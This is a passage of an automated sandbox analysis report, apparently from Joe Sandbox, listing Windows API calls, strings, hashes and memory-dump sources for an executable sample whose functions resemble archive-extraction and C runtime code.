                                                                • Part of subcall function 0088A1E0: DeleteFileW.KERNELBASE(000000FF,?,?,0088977F,?,?,008895CF,?,?,?,?,?,008B2641,000000FF), ref: 0088A1F1
                                                                • Part of subcall function 0088A1E0: DeleteFileW.KERNEL32(?,000000FF,?,00000800,?,?,0088977F,?,?,008895CF,?,?,?,?,?,008B2641), ref: 0088A21F
                                                              • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000001,00000080,00000000,?,?,00000001,?), ref: 00887139
                                                              • CloseHandle.KERNEL32(00000000), ref: 00887155
                                                              • CreateFileW.KERNEL32(?,C0000000,00000000,00000000,00000003,02200000,00000000), ref: 00887298
                                                                • Part of subcall function 00889DA2: FlushFileBuffers.KERNEL32(?,?,?,?,?,?,008873BC,?,?,?,00000000), ref: 00889DBC
                                                                • Part of subcall function 00889DA2: SetFileTime.KERNELBASE(?,?,?,?), ref: 00889E70
                                                                • Part of subcall function 00889620: FindCloseChangeNotification.KERNELBASE(000000FF,?,?,008895D6,?,?,?,?,?,008B2641,000000FF), ref: 0088963B
                                                                • Part of subcall function 0088A4ED: SetFileAttributesW.KERNELBASE(?,00000000,00000001,?,0088A325,?,?,?,0088A175,?,00000001,00000000,?,?), ref: 0088A501
                                                                • Part of subcall function 0088A4ED: SetFileAttributesW.KERNEL32(?,00000000,?,?,00000800,?,0088A325,?,?,?,0088A175,?,00000001,00000000,?,?), ref: 0088A532
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2005160777.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                                              • Associated: 00000000.00000002.2005149301.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005183638.00000000008B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005198800.00000000008BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005198800.00000000008C5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005198800.00000000008E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005243339.00000000008E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_880000_o9jDrpZrgR.jbxd
                                                              Similarity
                                                              • API ID: File$Close$AttributesCreateDeleteHandle_wcslen$BuffersChangeCurrentErrorFindFlushH_prologLastNotificationProcessTime
                                                              • String ID: SeCreateSymbolicLinkPrivilege$SeRestorePrivilege$UNC\$\??\
                                                              • API String ID: 2821348736-3508440684
                                                              • Opcode ID: 6abd1651cb7eccb87b680f4d4a94299f436a8203315b13eef9b51b697b8ee86e
                                                              • Instruction ID: d65c7cce2a0828ee2565dcc6bb27b8efd443ea9b43f9450444bd7372c8713cda
                                                              • Opcode Fuzzy Hash: 6abd1651cb7eccb87b680f4d4a94299f436a8203315b13eef9b51b697b8ee86e
                                                              • Instruction Fuzzy Hash: 47C1D771904644AAEB25FB78CC85FEEB7B8FF04300F14455AF956E3282D774EA448B62
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2005160777.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                                              • Associated: 00000000.00000002.2005149301.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005183638.00000000008B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005198800.00000000008BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005198800.00000000008C5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005198800.00000000008E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005243339.00000000008E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_880000_o9jDrpZrgR.jbxd
                                                              Similarity
                                                              • API ID: __floor_pentium4
                                                              • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                                                              • API String ID: 4168288129-2761157908
                                                              • Opcode ID: 385b8f8b08dff58d7584e08446b0aef45c6e61009acfcaa8a6522a0c2c41a583
                                                              • Instruction ID: 8c5488301edb0145e8e6045d2943c7553b9d5161de683308fe888a616fbc3f48
                                                              • Opcode Fuzzy Hash: 385b8f8b08dff58d7584e08446b0aef45c6e61009acfcaa8a6522a0c2c41a583
                                                              • Instruction Fuzzy Hash: A4C24C71E046288FEB25CE28DD407EAB7B5FB4A314F1445EAD44EE7641E778AE818F40
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2005160777.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                                              • Associated: 00000000.00000002.2005149301.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005183638.00000000008B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005198800.00000000008BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005198800.00000000008C5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005198800.00000000008E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005243339.00000000008E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_880000_o9jDrpZrgR.jbxd
                                                              Similarity
                                                              • API ID: H_prolog_swprintf
                                                              • String ID: CMT$h%u$hc%u
                                                              • API String ID: 146138363-3282847064
                                                              • Opcode ID: e1c04f6f4fb89184b8fc0516c37fa14a2f90f37e6922cd6af34aeab7884f3ec6
                                                              • Instruction ID: 3f0150330731a6bad37362189747830181cfed63d4de8b56c3b18f4df850ef3e
                                                              • Opcode Fuzzy Hash: e1c04f6f4fb89184b8fc0516c37fa14a2f90f37e6922cd6af34aeab7884f3ec6
                                                              • Instruction Fuzzy Hash: 9632D371510684ABDF14EF78C895AE93BA5FF15700F08047DFD8ACB286DB749A49CB21
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • __EH_prolog.LIBCMT ref: 00882874
                                                              • _strlen.LIBCMT ref: 00882E3F
                                                                • Part of subcall function 008902BA: __EH_prolog.LIBCMT ref: 008902BF
                                                                • Part of subcall function 00891B84: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,?,?,?,?,0088BAE9,00000000,?,?,?,0001042C), ref: 00891BA0
                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00882F91
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2005160777.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                                              • Associated: 00000000.00000002.2005149301.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005183638.00000000008B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005198800.00000000008BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005198800.00000000008C5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005198800.00000000008E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005243339.00000000008E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_880000_o9jDrpZrgR.jbxd
                                                              Similarity
                                                              • API ID: H_prolog$ByteCharMultiUnothrow_t@std@@@Wide__ehfuncinfo$??2@_strlen
                                                              • String ID: CMT
                                                              • API String ID: 1206968400-2756464174
                                                              • Opcode ID: 151a1c7c36b1a44acee8fd3126023eb117a4e48cb275083f137658a073984246
                                                              • Instruction ID: 2edd658bb5abc5399994902aa3d08096dcf3212fe1d31b3a76bf0fd9ddd915bb
                                                              • Opcode Fuzzy Hash: 151a1c7c36b1a44acee8fd3126023eb117a4e48cb275083f137658a073984246
                                                              • Instruction Fuzzy Hash: F86215715006458FDF29EF38C885AEA3BA1FF54310F08457EEC9ACB286DB75A945CB21
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • IsProcessorFeaturePresent.KERNEL32(00000017), ref: 0089F844
                                                              • IsDebuggerPresent.KERNEL32 ref: 0089F910
                                                              • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 0089F930
                                                              • UnhandledExceptionFilter.KERNEL32(?), ref: 0089F93A
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2005160777.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                                              • Associated: 00000000.00000002.2005149301.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005183638.00000000008B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005198800.00000000008BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005198800.00000000008C5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005198800.00000000008E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005243339.00000000008E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_880000_o9jDrpZrgR.jbxd
                                                              Similarity
                                                              • API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
                                                              • String ID:
                                                              • API String ID: 254469556-0
                                                              • Opcode ID: e9bfdd7ab57fb0808d25c7a14b7ea388011cc12a5ead4a8ec424333088c2fc72
                                                              • Instruction ID: 2ee7afa7ede5a7b3a2889a4593335866eaad5060ab292bddeea6bf23f6dcd1ac
                                                              • Opcode Fuzzy Hash: e9bfdd7ab57fb0808d25c7a14b7ea388011cc12a5ead4a8ec424333088c2fc72
                                                              • Instruction Fuzzy Hash: DB310775D052199BDF20EFA4D9897CCBBB8FF08304F1041AAE50CEB251EB719A848F45
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • VirtualQuery.KERNEL32(80000000,0089E5E8,0000001C,0089E7DD,00000000,?,?,?,?,?,?,?,0089E5E8,00000004,008E1CEC,0089E86D), ref: 0089E6B4
                                                              • GetSystemInfo.KERNEL32(?,?,00000000,?,?,?,?,0089E5E8,00000004,008E1CEC,0089E86D), ref: 0089E6CF
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2005160777.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                                              • Associated: 00000000.00000002.2005149301.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005183638.00000000008B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005198800.00000000008BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005198800.00000000008C5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005198800.00000000008E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005243339.00000000008E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_880000_o9jDrpZrgR.jbxd
                                                              Similarity
                                                              • API ID: InfoQuerySystemVirtual
                                                              • String ID: D
                                                              • API String ID: 401686933-2746444292
                                                              • Opcode ID: 9df215dfa1952836f1d22f05ee145d4e0b4cc2aca5837ef7ec69c74232636c61
                                                              • Instruction ID: d64cebfc67bee823239afa1b0638eb968152cce4e44c016b4bd1761d1469eb06
                                                              • Opcode Fuzzy Hash: 9df215dfa1952836f1d22f05ee145d4e0b4cc2aca5837ef7ec69c74232636c61
                                                              • Instruction Fuzzy Hash: 9201D432600109ABDF14EE69DC49ADD7BAEFFC4324F0CC224ED19D6150E634D9058680
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • IsDebuggerPresent.KERNEL32(?,?,?,?,?,?), ref: 008A8FB5
                                                              • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,?), ref: 008A8FBF
                                                              • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,?), ref: 008A8FCC
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2005160777.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                                              • Associated: 00000000.00000002.2005149301.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005183638.00000000008B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005198800.00000000008BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005198800.00000000008C5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005198800.00000000008E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005243339.00000000008E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_880000_o9jDrpZrgR.jbxd
                                                              Similarity
                                                              • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                              • String ID:
                                                              • API String ID: 3906539128-0
                                                              • Opcode ID: 923cca5a9492771c98344db2ad939740f94662dece43dd87433da693b19e4091
                                                              • Instruction ID: 94af7a97742f8acdabd79dd8e72ae021220a7d875f429fc00eae1544dd1bc90c
                                                              • Opcode Fuzzy Hash: 923cca5a9492771c98344db2ad939740f94662dece43dd87433da693b19e4091
                                                              • Instruction Fuzzy Hash: 6F31B775901219ABCB21DF68D88979DBBB8FF08310F5042EAE41CE6251EB709F858F55
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2005160777.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                                              • Associated: 00000000.00000002.2005149301.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005183638.00000000008B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005198800.00000000008BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005198800.00000000008C5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005198800.00000000008E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005243339.00000000008E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_880000_o9jDrpZrgR.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: .
                                                              • API String ID: 0-248832578
                                                              • Opcode ID: e6d1d37b230826515efb311c4f495b72c612a2dff0d4260dff60ceb004de1500
                                                              • Instruction ID: 155f40e29e6cefab636a5587c63946f4551818c674066c1225bb022ec19a3086
                                                              • Opcode Fuzzy Hash: e6d1d37b230826515efb311c4f495b72c612a2dff0d4260dff60ceb004de1500
                                                              • Instruction Fuzzy Hash: D6310471900249AFEB249E78CC84EFA7BBDFB86314F0402A8E918D7653E7309E458B50
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2005160777.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                                              • Associated: 00000000.00000002.2005149301.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005183638.00000000008B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005198800.00000000008BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005198800.00000000008C5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005198800.00000000008E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005243339.00000000008E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_880000_o9jDrpZrgR.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: aeb1b63111f38c8b5239956e5f87fb8bcb0c35bf5c950da3c1a86b78fccd596c
                                                              • Instruction ID: e516d18259b8a9e3ebfacdea09bcc80e99fe788ca3d8fc98b8e9531d8f7f5298
                                                              • Opcode Fuzzy Hash: aeb1b63111f38c8b5239956e5f87fb8bcb0c35bf5c950da3c1a86b78fccd596c
                                                              • Instruction Fuzzy Hash: CE021B71E012199BEF18CFA9C8806ADB7F1FF49314F258269D91AE7780D734AE41CB90
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • GetLocaleInfoW.KERNEL32(00000400,0000000F,?,00000064), ref: 0089AF35
                                                              • GetNumberFormatW.KERNEL32(00000400,00000000,?,008BE72C,?,?), ref: 0089AF84
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2005160777.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                                              • Associated: 00000000.00000002.2005149301.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005183638.00000000008B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005198800.00000000008BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005198800.00000000008C5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005198800.00000000008E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005243339.00000000008E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_880000_o9jDrpZrgR.jbxd
                                                              Similarity
                                                              • API ID: FormatInfoLocaleNumber
                                                              • String ID:
                                                              • API String ID: 2169056816-0
                                                              • Opcode ID: 06d03dbc1c63d3cbc8754fb310078970e888b81d75b6c1bd4f31a989198198e7
                                                              • Instruction ID: f5ce55e7f9cd41c6b9bad41a3bb9fb3336ab3332e9cc9085e0bb81200169e087
                                                              • Opcode Fuzzy Hash: 06d03dbc1c63d3cbc8754fb310078970e888b81d75b6c1bd4f31a989198198e7
                                                              • Instruction Fuzzy Hash: B3015E7A150318AED7109F64DC45FDA77BCFF09710F009122FB05D7251D7749A258BA5
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • GetLastError.KERNEL32(00886DDF,00000000,00000400), ref: 00886C74
                                                              • FormatMessageW.KERNEL32(00001200,00000000,00000000,00000400,?,?,00000000), ref: 00886C95
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2005160777.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                                              • Associated: 00000000.00000002.2005149301.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005183638.00000000008B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005198800.00000000008BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005198800.00000000008C5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005198800.00000000008E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005243339.00000000008E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_880000_o9jDrpZrgR.jbxd
                                                              Similarity
                                                              • API ID: ErrorFormatLastMessage
                                                              • String ID:
                                                              • API String ID: 3479602957-0
                                                              • Opcode ID: dd86ff53234f312106b26fca3973d5a37ed87c093991b0c89d67746fc20b6c77
                                                              • Instruction ID: c7fc30f56ceea005351404bbedd4a4c690440457acbaf591a1137805211fae7d
                                                              • Opcode Fuzzy Hash: dd86ff53234f312106b26fca3973d5a37ed87c093991b0c89d67746fc20b6c77
                                                              • Instruction Fuzzy Hash: ECD0C971348304BFFA112B618E06F2A7B9AFF45B52F18C504B795E80F0DA749425A729
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,008B19EF,?,?,00000008,?,?,008B168F,00000000), ref: 008B1C21
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2005160777.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                                              • Associated: 00000000.00000002.2005149301.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005183638.00000000008B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005198800.00000000008BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005198800.00000000008C5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005198800.00000000008E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005243339.00000000008E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_880000_o9jDrpZrgR.jbxd
                                                              Similarity
                                                              • API ID: ExceptionRaise
                                                              • String ID:
                                                              • API String ID: 3997070919-0
                                                              • Opcode ID: 94931b7d853650773ffb3e62da2907475b18e1986891336be4bfb1847906968d
                                                              • Instruction ID: ee4f1a8304cbe526a02ea2968f24610ec7767e552b6c088bd56c29c9351afa74
                                                              • Opcode Fuzzy Hash: 94931b7d853650773ffb3e62da2907475b18e1986891336be4bfb1847906968d
                                                              • Instruction Fuzzy Hash: 36B11A31610609DFDB19CF28C4AABA57BE0FF45364F658658E899CF3A1C335E991CB40
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 0089F66A
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2005160777.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                                              • Associated: 00000000.00000002.2005149301.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005183638.00000000008B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005198800.00000000008BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005198800.00000000008C5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005198800.00000000008E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005243339.00000000008E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_880000_o9jDrpZrgR.jbxd
                                                              Similarity
                                                              • API ID: FeaturePresentProcessor
                                                              • String ID:
                                                              • API String ID: 2325560087-0
                                                              • Opcode ID: bfa60060212cd00f96157c73c3ae470caac0f73a466f880556cc0eabad22d203
                                                              • Instruction ID: d5739d80ec4ef442483005ce22e10e4fbfb3d43f9fb7a75d4af8107697b78cc1
                                                              • Opcode Fuzzy Hash: bfa60060212cd00f96157c73c3ae470caac0f73a466f880556cc0eabad22d203
                                                              • Instruction Fuzzy Hash: 25518EB1A006499FEF68CF98EC857AEBBF4FB48354F28853AD501EB251D3749900CB60
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • GetVersionExW.KERNEL32(?), ref: 0088B16B
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2005160777.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                                              • Associated: 00000000.00000002.2005149301.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005183638.00000000008B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005198800.00000000008BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005198800.00000000008C5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005198800.00000000008E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005243339.00000000008E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_880000_o9jDrpZrgR.jbxd
                                                              Similarity
                                                              • API ID: Version
                                                              • String ID:
                                                              • API String ID: 1889659487-0
                                                              • Opcode ID: f383bc62306dd65147a1abe44732659cdb61db0bc5e0835b9ae1946584a8dfad
                                                              • Instruction ID: bd2fcbcb336574490e3ad2e96957f4a5847500ea90626a3d6a328d23daab4c58
                                                              • Opcode Fuzzy Hash: f383bc62306dd65147a1abe44732659cdb61db0bc5e0835b9ae1946584a8dfad
                                                              • Instruction Fuzzy Hash: 8BF030B8D00A088FDB18DF18ED99AD977F1FB99715F104295D51593390C770AD818F60
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2005160777.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                                              • Associated: 00000000.00000002.2005149301.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005183638.00000000008B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005198800.00000000008BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005198800.00000000008C5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005198800.00000000008E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005243339.00000000008E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_880000_o9jDrpZrgR.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: gj
                                                              • API String ID: 0-4203073231
                                                              • Opcode ID: 7cae43384f8f068cd217833c0fc0db49b57b08a288af66eae8af549140a68ce0
                                                              • Instruction ID: f5ec70b93cbf89d2f854f10d5a84d72ed54f359ac52425130ccb45caf309faee
                                                              • Opcode Fuzzy Hash: 7cae43384f8f068cd217833c0fc0db49b57b08a288af66eae8af549140a68ce0
                                                              • Instruction Fuzzy Hash: 95C147B6A083418FC354CF29D88065AFBE1BFC9308F59892DE998D7311D734E948DB96
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • SetUnhandledExceptionFilter.KERNEL32(Function_0001F9F0,0089F3A5), ref: 0089F9DA
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2005160777.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                                              • Associated: 00000000.00000002.2005149301.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005183638.00000000008B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005198800.00000000008BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005198800.00000000008C5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005198800.00000000008E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005243339.00000000008E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_880000_o9jDrpZrgR.jbxd
                                                              Similarity
                                                              • API ID: ExceptionFilterUnhandled
                                                              • String ID:
                                                              • API String ID: 3192549508-0
                                                              • Opcode ID: da88e879de842cec0d8845de4f1016e976e1fe55220df5887e11b895e8771f4d
                                                              • Instruction ID: 58168840b237e9f55f740707fce668cca349477047b2302565ba77c4a384e520
                                                              • Opcode Fuzzy Hash: da88e879de842cec0d8845de4f1016e976e1fe55220df5887e11b895e8771f4d
                                                              • Instruction Fuzzy Hash:
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2005160777.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
